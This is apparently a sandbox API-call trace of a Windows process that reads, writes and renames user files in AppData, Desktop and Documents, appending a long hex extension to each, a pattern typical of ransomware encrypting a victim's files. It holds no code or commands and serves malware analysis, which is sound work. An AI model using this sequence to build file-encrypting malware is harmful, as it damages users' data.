[0123.452] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.453] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.454] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a", lpString2=".303F508D17DC13962C1CCDBBC9210E5A08E5B08BAF4E84D2104FDAA94488F328" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a.303F508D17DC13962C1CCDBBC9210E5A08E5B08BAF4E84D2104FDAA94488F328") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a.303F508D17DC13962C1CCDBBC9210E5A08E5B08BAF4E84D2104FDAA94488F328" [0123.454] GetProcessHeap () returned 0x600000 [0123.454] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x122) returned 0x6f5b70 [0123.454] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x6f5b70, Length=0x122, FileInformationClass=0xa) returned 0x0 [0123.455] CloseHandle (hObject=0x308) returned 1 [0123.456] GetProcessHeap () returned 0x600000 [0123.456] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.456] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.461] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.461] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.462] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.462] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx", lpString2=".7994BB6B5B499D08F909462C5DBAA33A2CE0E269DE6B3AD5931D2CC0C81C6049" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx.7994BB6B5B499D08F909462C5DBAA33A2CE0E269DE6B3AD5931D2CC0C81C6049") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx.7994BB6B5B499D08F909462C5DBAA33A2CE0E269DE6B3AD5931D2CC0C81C6049" [0123.462] GetProcessHeap () returned 0x600000 [0123.462] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x134) returned 0x3151570 [0123.462] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3151570, Length=0x134, FileInformationClass=0xa) returned 0x0 [0123.464] CloseHandle (hObject=0x308) returned 1 [0123.468] GetProcessHeap () returned 0x600000 [0123.468] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.468] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.474] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.474] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.475] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.476] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp", lpString2=".857F2B1D84D4D6EA970F49D963A056DC9E43E63B6B421A6024186B2D663DC723" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp.857F2B1D84D4D6EA970F49D963A056DC9E43E63B6B421A6024186B2D663DC723") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp.857F2B1D84D4D6EA970F49D963A056DC9E43E63B6B421A6024186B2D663DC723" [0123.476] GetProcessHeap () returned 0x600000 [0123.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x136) returned 0x3151800 [0123.476] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3151800, Length=0x136, FileInformationClass=0xa) returned 0x0 [0123.477] CloseHandle (hObject=0x308) returned 1 [0123.478] GetProcessHeap () returned 0x600000 [0123.478] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.478] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.482] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.482] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.483] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.484] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif", lpString2=".4EA145537C7022C098D6D14EA1C2E119148678C5F441361C9A45915F7E49D90E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif.4EA145537C7022C098D6D14EA1C2E119148678C5F441361C9A45915F7E49D90E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif.4EA145537C7022C098D6D14EA1C2E119148678C5F441361C9A45915F7E49D90E" [0123.484] GetProcessHeap () returned 0x600000 [0123.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11c) returned 0x3117950 [0123.484] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3117950, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0123.486] CloseHandle (hObject=0x308) returned 1 [0123.487] GetProcessHeap () returned 0x600000 [0123.487] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.487] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.490] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.491] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.492] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.492] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a", lpString2=".A8AE969CF7C2E2B6251622AC2672E0509D37360AE4AD37DA37321FEBF415595F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a.A8AE969CF7C2E2B6251622AC2672E0509D37360AE4AD37DA37321FEBF415595F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a.A8AE969CF7C2E2B6251622AC2672E0509D37360AE4AD37DA37321FEBF415595F" [0123.492] GetProcessHeap () returned 0x600000 [0123.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12e) returned 0x3117a78 [0123.492] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3117a78, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0123.494] CloseHandle (hObject=0x308) returned 1 [0123.494] GetProcessHeap () returned 0x600000 [0123.494] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.495] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.498] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.499] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.500] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.500] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a", lpString2=".66B21040E289EBD87B4CC1E95D4A146EC995851F7A9EB34A0E4BB934B9BC5374" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a.66B21040E289EBD87B4CC1E95D4A146EC995851F7A9EB34A0E4BB934B9BC5374") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a.66B21040E289EBD87B4CC1E95D4A146EC995851F7A9EB34A0E4BB934B9BC5374" [0123.500] GetProcessHeap () returned 0x600000 [0123.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x130) returned 0x6f5ca8 [0123.500] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x6f5ca8, Length=0x130, FileInformationClass=0xa) returned 0x0 [0123.502] CloseHandle (hObject=0x308) returned 1 [0123.502] GetProcessHeap () returned 0x600000 [0123.502] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.502] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.506] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.506] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.507] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.507] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3", lpString2=".0E5F78D5993767E29C9DC85039152F15177B71C8A29CC2719CB6119052605155" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3.0E5F78D5993767E29C9DC85039152F15177B71C8A29CC2719CB6119052605155") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3.0E5F78D5993767E29C9DC85039152F15177B71C8A29CC2719CB6119052605155" [0123.507] GetProcessHeap () returned 0x600000 [0123.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x3117bb0 [0123.508] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3117bb0, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0123.509] CloseHandle (hObject=0x308) returned 1 [0123.509] GetProcessHeap () returned 0x600000 [0123.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.510] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.517] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.517] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.518] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x26fff70) returned 0x0 [0123.519] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx", lpString2=".5B1425CD858AECBC8A3F5BACF05AAFB0F939C24BA346C7CDBE4C56538CCB300C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx.5B1425CD858AECBC8A3F5BACF05AAFB0F939C24BA346C7CDBE4C56538CCB300C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx.5B1425CD858AECBC8A3F5BACF05AAFB0F939C24BA346C7CDBE4C56538CCB300C" [0123.519] GetProcessHeap () returned 0x600000 [0123.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x130) returned 0x6f62c0 [0123.519] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x6f62c0, Length=0x130, FileInformationClass=0xa) returned 0x0 [0123.520] CloseHandle (hObject=0x308) returned 1 [0123.521] GetProcessHeap () returned 0x600000 [0123.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.521] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.565] ReadFile (in: hFile=0x304, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.565] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.578] WriteFile (in: hFile=0x308, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.579] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.715] ReadFile (in: hFile=0x308, lpBuffer=0x32c1040, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0f08 | out: lpBuffer=0x32c1040*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0f08) returned 1 [0123.715] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.715] WriteFile (in: hFile=0x308, lpBuffer=0x32c1040, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0f08 | out: lpBuffer=0x32c1040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0f08) returned 0x0 [0123.832] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.832] WriteFile (in: hFile=0x334, lpBuffer=0x34064a0, nNumberOfBytesToWrite=0x4800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33e6368 | out: lpBuffer=0x34064a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33e6368) returned 0x0 [0123.835] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.835] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x26fff70) returned 0x0 [0123.835] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp", lpString2=".83467BCEE1B4E88D8A6730CCBB4EDE91830A85BFF193FAC0FDB13307EE1F5E07" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp.83467BCEE1B4E88D8A6730CCBB4EDE91830A85BFF193FAC0FDB13307EE1F5E07") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp.83467BCEE1B4E88D8A6730CCBB4EDE91830A85BFF193FAC0FDB13307EE1F5E07" [0123.835] GetProcessHeap () returned 0x600000 [0123.835] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x112) returned 0x3368628 [0123.835] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x26fff60, FileInformation=0x3368628, Length=0x112, FileInformationClass=0xa) returned 0x0 [0123.841] CloseHandle (hObject=0x324) returned 1 [0123.843] GetProcessHeap () returned 0x600000 [0123.843] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0123.846] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.846] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33e6418, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x33e6418, ReturnLength=0x26fff70) returned 0x0 [0123.846] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg", lpString2=".4C1DD0CF8E35ACDEEAACD0E698559FB092A5B98C5A29FAE079913293441C800C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg.4C1DD0CF8E35ACDEEAACD0E698559FB092A5B98C5A29FAE079913293441C800C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg.4C1DD0CF8E35ACDEEAACD0E698559FB092A5B98C5A29FAE079913293441C800C" [0123.847] GetProcessHeap () returned 0x600000 [0123.847] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x136) returned 0x3151948 [0123.847] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x26fff60, FileInformation=0x3151948, Length=0x136, FileInformationClass=0xa) returned 0x0 [0123.869] CloseHandle (hObject=0x334) returned 1 [0123.869] GetProcessHeap () returned 0x600000 [0123.869] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x33e6368 | out: hHeap=0x600000) returned 1 [0123.870] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.910] WriteFile (in: hFile=0x33c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.924] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0123.930] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0123.931] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3", lpString2=".67EB3C40736AE6BFF62FBA09AE1F98D44A038DCE6A9BC777DAD4A1C006F6F65D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3.67EB3C40736AE6BFF62FBA09AE1F98D44A038DCE6A9BC777DAD4A1C006F6F65D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3.67EB3C40736AE6BFF62FBA09AE1F98D44A038DCE6A9BC777DAD4A1C006F6F65D" [0123.931] GetProcessHeap () returned 0x600000 [0123.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x3153ef8 [0123.931] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x26fff60, FileInformation=0x3153ef8, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0123.933] CloseHandle (hObject=0x334) returned 1 [0123.933] GetProcessHeap () returned 0x600000 [0123.933] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0123.933] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0124.291] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0124.292] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps", lpString2=".8C6F0F811A703EB71E791C3D41A38C121B1FCEEF7A3FCA302FFC9C72ED1E524E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps.8C6F0F811A703EB71E791C3D41A38C121B1FCEEF7A3FCA302FFC9C72ED1E524E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps.8C6F0F811A703EB71E791C3D41A38C121B1FCEEF7A3FCA302FFC9C72ED1E524E" [0124.292] GetProcessHeap () returned 0x600000 [0124.292] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x148) returned 0x33692e8 [0124.292] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x26fff60, FileInformation=0x33692e8, Length=0x148, FileInformationClass=0xa) returned 0x0 [0124.292] CloseHandle (hObject=0x328) returned 1 [0124.293] GetProcessHeap () returned 0x600000 [0124.293] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 